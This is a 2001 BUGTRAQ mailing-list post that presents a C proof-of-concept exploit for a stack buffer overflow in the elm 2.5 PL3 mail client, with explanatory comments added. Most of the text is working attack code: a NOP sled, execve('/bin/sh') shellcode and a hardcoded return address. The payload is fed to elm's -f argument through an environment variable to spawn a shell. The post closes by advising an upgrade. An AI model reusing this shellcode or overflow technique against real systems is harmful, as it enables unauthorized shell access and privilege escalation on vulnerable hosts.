Date:         Tue, 13 Feb 2001 13:36:02 +0100
From: kiss <NIKEBOY@RETEMAIL.ES>
Subject:      elm 2.5 PL3 exploit
To: BUGTRAQ@SECURITYFOCUS.COM

this is just a proof of concept; i haven't included the setgid call in the
shellcode:

/***
    -------------
    elm253-exploit.c
    -------------
***/

#include <stdlib.h>

/* Filler byte for the sled: the x86 one-byte NOP (0x90). */
#define NOP 0x90
/* Payload length written into buffer; the arrays carry 4 extra bytes of slack. */
#define LEN 356
/* Defined but never used anywhere in this listing. */
#define OFFSET 0
/* Fixed address that every overwritten return pointer is set to. It sits in
 * the classic i386 Linux user-stack range and was presumably taken from
 * dame_sp() on the author's machine; it is only meaningful for that exact
 * stack layout (no address randomisation), which is one reason a payload of
 * this shape fails on hardened systems. */
#define RET 0xbffffa64

/*
 * dame_sp: returns the current stack pointer on 32-bit x86.
 *
 * Relies entirely on the i386 calling convention: the inline asm copies
 * %esp into %eax and the function then falls off its closing brace with no
 * `return`, so whatever is left in %eax is what the caller sees. Reaching
 * the end of a non-void function without a return is undefined behaviour in
 * C, so this only works by accident of the compiler's code generation.
 * Not called anywhere in this listing (a helper for finding RET by hand).
 */
unsigned long dame_sp() {
	__asm__("movl %esp,%eax");	/* %eax is the i386 integer return register */
}

/*
 * Proof-of-concept driver for the elm 2.5 PL3 stack overflow (BUGTRAQ, 2001).
 *
 * Builds a LEN-byte payload in `buffer` laid out as
 *     [NOP sled][shellcode][RET, RET, RET, ...]
 * and passes it to elm through the KID environment variable, which the shell
 * expands on elm's "-f" argument. The attack only works if RET lands inside
 * the sled and the stack is executable, i.e. it depends on a fixed,
 * predictable stack address; address randomisation, non-executable stacks
 * and stack canaries each break it. The vendor fix is to upgrade elm.
 *
 * Notes on the code as written:
 *   - `void main()` is non-standard, and printf/strlen/strcpy/strcat are used
 *     without <stdio.h>/<string.h>, so they are implicitly declared.
 *   - `buffer` is never NUL-terminated (none of NOP, the shellcode bytes or
 *     the bytes of RET are zero), so strcat() reads past its end until it
 *     finds a zero elsewhere on the stack: undefined behaviour, and the
 *     copied length is not the LEN the layout suggests.
 *   - OFFSET and dame_sp() are defined but unused.
 */
void main() {

	/* Classic execve("/bin/sh") stub: a jmp/call pair fetches the address
	 * of the trailing "/bin/sh" string, then int $0x80. The four
	 * commented-out instructions are the privilege call the author says
	 * was left out (see the covering mail). */
  	static char shellcode[]=
/* "\x31\xc0"	*/		/* xorl %eax,%eax	 */
/* "\x31\xdb"	*/		/* xorl %ebx,%ebx	 */
/* "\xb0\x17"	*/		/* movb $0x17,%al	 */
/* "\xcd\x80"	*/     		/* int $0x80     	 */
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

	int i=0;
	int cont=0;		/* read index into shellcode during pass 3 */
	char buffer[LEN+4];	/* payload; +4 so the last 4-byte RET store fits */
	char kid[6+LEN+4];	/* "KID=" + payload (+ terminator slack) */

	printf("-------------------------------------\n");
	printf("elm buffer overflow exploit by _kiss_\n");
	printf("-------------------------------------\n");

	/* Pass 1: fill the whole LEN+4 bytes with copies of RET, four bytes at a
	 * time (i = 0, 4, ..., 356; the last store ends exactly at buffer[LEN+3]).
	 * Storing through a `long *` into a char array is an aliasing/alignment
	 * violation in C that happens to work on i386. */
	for (i=0;i<=LEN;i+=4)
		*(long *) &buffer[i] = RET;

	/* Pass 2: overwrite the front with the NOP sled, leaving room for the
	 * shellcode followed by 100 bytes of RET. `i` is int and strlen()
	 * returns size_t, so the comparison is evaluated unsigned; harmless
	 * here because the bound is positive. */
	for (i=0;i<LEN-strlen(shellcode)-100;i++)
		buffer[i]=NOP;

	/* Pass 3: copy the shellcode directly after the sled. Bytes
	 * [LEN-100, LEN+4) keep the RET values from pass 1. */
	for (i=LEN-strlen(shellcode)-100;i<LEN-100;i++)
		buffer[i]=shellcode[cont++];

	/* Build "KID=<payload>". buffer has no terminator, so strcat keeps
	 * copying until it meets a zero byte somewhere beyond buffer's end and
	 * may overrun kid as well (undefined behaviour). */
	strcpy(kid,"KID=");
	strcat(kid,buffer);
	/* Export KID and run elm through the shell; "$KID" is expanded by
	 * /bin/sh, so the payload arrives as elm's "-f" folder argument.
	 * kid is an automatic array, which is fine only because system()
	 * runs before it goes out of scope. */
	putenv(kid);
	system("/usr/local/bin/elm -f $KID");
}


the solution is simple: upgrade ;)

							_kiss_